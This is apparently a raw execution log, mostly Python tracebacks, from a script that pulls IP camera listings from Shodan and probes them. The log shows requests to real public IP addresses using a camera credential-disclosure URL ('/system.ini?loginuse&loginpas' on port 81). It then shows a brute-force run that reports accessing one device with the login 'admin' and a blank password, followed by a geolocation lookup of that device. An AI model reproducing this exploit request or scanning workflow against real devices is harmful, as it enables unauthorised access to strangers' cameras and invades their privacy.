INFO:root:2023-04-10 01:48:07.546466: Program started.

INFO:root:[2023-04-10 01:48:22.978296]: Modules imported successfully.

INFO:root:[2023-04-10 01:48:23.096599]: Search operation started without arguments.

INFO:root:[2023-04-10 01:48:26.117588]: Received camera data from Shodan.

INFO:root:[2023-04-10 01:48:26.117588]: Camera sweeps have begun.

ERROR:root:[2023-04-10 01:49:05.229905]
Traceback (most recent call last):
  File "C:\Users\maxtyson\AppData\Local\Programs\Python\Python38\lib\site-packages\urllib3\connectionpool.py", line 426, in _make_request
    six.raise_from(e, None)
  File "<string>", line 3, in raise_from
  File "C:\Users\maxtyson\AppData\Local\Programs\Python\Python38\lib\site-packages\urllib3\connectionpool.py", line 421, in _make_request
    httplib_response = conn.getresponse()
  File "C:\Users\maxtyson\AppData\Local\Programs\Python\Python38\lib\http\client.py", line 1347, in getresponse
    response.begin()
  File "C:\Users\maxtyson\AppData\Local\Programs\Python\Python38\lib\http\client.py", line 307, in begin
    version, status, reason = self._read_status()
  File "C:\Users\maxtyson\AppData\Local\Programs\Python\Python38\lib\http\client.py", line 268, in _read_status
    line = str(self.fp.readline(_MAXLINE + 1), "iso-8859-1")
  File "C:\Users\maxtyson\AppData\Local\Programs\Python\Python38\lib\socket.py", line 669, in readinto
    return self._sock.recv_into(b)
socket.timeout: timed out

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "C:\Users\maxtyson\AppData\Local\Programs\Python\Python38\lib\site-packages\requests\adapters.py", line 439, in send
    resp = conn.urlopen(
  File "C:\Users\maxtyson\AppData\Local\Programs\Python\Python38\lib\site-packages\urllib3\connectionpool.py", line 726, in urlopen
    retries = retries.increment(
  File "C:\Users\maxtyson\AppData\Local\Programs\Python\Python38\lib\site-packages\urllib3\util\retry.py", line 410, in increment
    raise six.reraise(type(error), error, _stacktrace)
  File "C:\Users\maxtyson\AppData\Local\Programs\Python\Python38\lib\site-packages\urllib3\packages\six.py", line 735, in reraise
    raise value
  File "C:\Users\maxtyson\AppData\Local\Programs\Python\Python38\lib\site-packages\urllib3\connectionpool.py", line 670, in urlopen
    httplib_response = self._make_request(
  File "C:\Users\maxtyson\AppData\Local\Programs\Python\Python38\lib\site-packages\urllib3\connectionpool.py", line 428, in _make_request
    self._raise_timeout(err=e, url=url, timeout_value=read_timeout)
  File "C:\Users\maxtyson\AppData\Local\Programs\Python\Python38\lib\site-packages\urllib3\connectionpool.py", line 335, in _raise_timeout
    raise ReadTimeoutError(
urllib3.exceptions.ReadTimeoutError: HTTPConnectionPool(host='121.37.207.154', port=81): Read timed out. (read timeout=10)

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "C:\Users\maxtyson\Desktop\fin.py", line 401, in st
    r = get(f"http://{ip}:81/system.ini?loginuse&loginpas", timeout=10)
  File "C:\Users\maxtyson\AppData\Local\Programs\Python\Python38\lib\site-packages\requests\api.py", line 75, in get
    return request('get', url, params=params, **kwargs)
  File "C:\Users\maxtyson\AppData\Local\Programs\Python\Python38\lib\site-packages\requests\api.py", line 60, in request
    return session.request(method=method, url=url, **kwargs)
  File "C:\Users\maxtyson\AppData\Local\Programs\Python\Python38\lib\site-packages\requests\sessions.py", line 533, in request
    resp = self.send(prep, **send_kwargs)
  File "C:\Users\maxtyson\AppData\Local\Programs\Python\Python38\lib\site-packages\requests\sessions.py", line 646, in send
    r = adapter.send(request, **kwargs)
  File "C:\Users\maxtyson\AppData\Local\Programs\Python\Python38\lib\site-packages\requests\adapters.py", line 529, in send
    raise ReadTimeout(e, request=request)
requests.exceptions.ReadTimeout: HTTPConnectionPool(host='121.37.207.154', port=81): Read timed out. (read timeout=10)

ERROR:root:[2023-04-10 01:49:35.076121]
Traceback (most recent call last):
  File "C:\Users\maxtyson\AppData\Local\Programs\Python\Python38\lib\site-packages\urllib3\connection.py", line 159, in _new_conn
    conn = connection.create_connection(
  File "C:\Users\maxtyson\AppData\Local\Programs\Python\Python38\lib\site-packages\urllib3\util\connection.py", line 84, in create_connection
    raise err
  File "C:\Users\maxtyson\AppData\Local\Programs\Python\Python38\lib\site-packages\urllib3\util\connection.py", line 74, in create_connection
    sock.connect(sa)
socket.timeout: timed out

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "C:\Users\maxtyson\AppData\Local\Programs\Python\Python38\lib\site-packages\urllib3\connectionpool.py", line 670, in urlopen
    httplib_response = self._make_request(
  File "C:\Users\maxtyson\AppData\Local\Programs\Python\Python38\lib\site-packages\urllib3\connectionpool.py", line 392, in _make_request
    conn.request(method, url, **httplib_request_kw)
  File "C:\Users\maxtyson\AppData\Local\Programs\Python\Python38\lib\http\client.py", line 1255, in request
    self._send_request(method, url, body, headers, encode_chunked)
  File "C:\Users\maxtyson\AppData\Local\Programs\Python\Python38\lib\http\client.py", line 1301, in _send_request
    self.endheaders(body, encode_chunked=encode_chunked)
  File "C:\Users\maxtyson\AppData\Local\Programs\Python\Python38\lib\http\client.py", line 1250, in endheaders
    self._send_output(message_body, encode_chunked=encode_chunked)
  File "C:\Users\maxtyson\AppData\Local\Programs\Python\Python38\lib\http\client.py", line 1010, in _send_output
    self.send(msg)
  File "C:\Users\maxtyson\AppData\Local\Programs\Python\Python38\lib\http\client.py", line 950, in send
    self.connect()
  File "C:\Users\maxtyson\AppData\Local\Programs\Python\Python38\lib\site-packages\urllib3\connection.py", line 187, in connect
    conn = self._new_conn()
  File "C:\Users\maxtyson\AppData\Local\Programs\Python\Python38\lib\site-packages\urllib3\connection.py", line 164, in _new_conn
    raise ConnectTimeoutError(
urllib3.exceptions.ConnectTimeoutError: (<urllib3.connection.HTTPConnection object at 0x000000E7C59A37C0>, 'Connection to 5.228.135.225 timed out. (connect timeout=10)')

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "C:\Users\maxtyson\AppData\Local\Programs\Python\Python38\lib\site-packages\requests\adapters.py", line 439, in send
    resp = conn.urlopen(
  File "C:\Users\maxtyson\AppData\Local\Programs\Python\Python38\lib\site-packages\urllib3\connectionpool.py", line 726, in urlopen
    retries = retries.increment(
  File "C:\Users\maxtyson\AppData\Local\Programs\Python\Python38\lib\site-packages\urllib3\util\retry.py", line 446, in increment
    raise MaxRetryError(_pool, url, error or ResponseError(cause))
urllib3.exceptions.MaxRetryError: HTTPConnectionPool(host='5.228.135.225', port=81): Max retries exceeded with url: /system.ini?loginuse&loginpas (Caused by ConnectTimeoutError(<urllib3.connection.HTTPConnection object at 0x000000E7C59A37C0>, 'Connection to 5.228.135.225 timed out. (connect timeout=10)'))

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "C:\Users\maxtyson\Desktop\fin.py", line 401, in st
    r = get(f"http://{ip}:81/system.ini?loginuse&loginpas", timeout=10)
  File "C:\Users\maxtyson\AppData\Local\Programs\Python\Python38\lib\site-packages\requests\api.py", line 75, in get
    return request('get', url, params=params, **kwargs)
  File "C:\Users\maxtyson\AppData\Local\Programs\Python\Python38\lib\site-packages\requests\api.py", line 60, in request
    return session.request(method=method, url=url, **kwargs)
  File "C:\Users\maxtyson\AppData\Local\Programs\Python\Python38\lib\site-packages\requests\sessions.py", line 533, in request
    resp = self.send(prep, **send_kwargs)
  File "C:\Users\maxtyson\AppData\Local\Programs\Python\Python38\lib\site-packages\requests\sessions.py", line 646, in send
    r = adapter.send(request, **kwargs)
  File "C:\Users\maxtyson\AppData\Local\Programs\Python\Python38\lib\site-packages\requests\adapters.py", line 504, in send
    raise ConnectTimeout(e, request=request)
requests.exceptions.ConnectTimeout: HTTPConnectionPool(host='5.228.135.225', port=81): Max retries exceeded with url: /system.ini?loginuse&loginpas (Caused by ConnectTimeoutError(<urllib3.connection.HTTPConnection object at 0x000000E7C59A37C0>, 'Connection to 5.228.135.225 timed out. (connect timeout=10)'))

INFO:root:[2023-04-10 01:49:37.165319]: Bruteforce started.

INFO:root:[2023-04-10 01:49:55.970729]: Accessed: 94.62.203.88, ('admin', '')

INFO:geocoder.base:Requested http://ipinfo.io/94.62.203.88/json
INFO:root:[2023-04-10 01:49:56.232850]: Shutdown

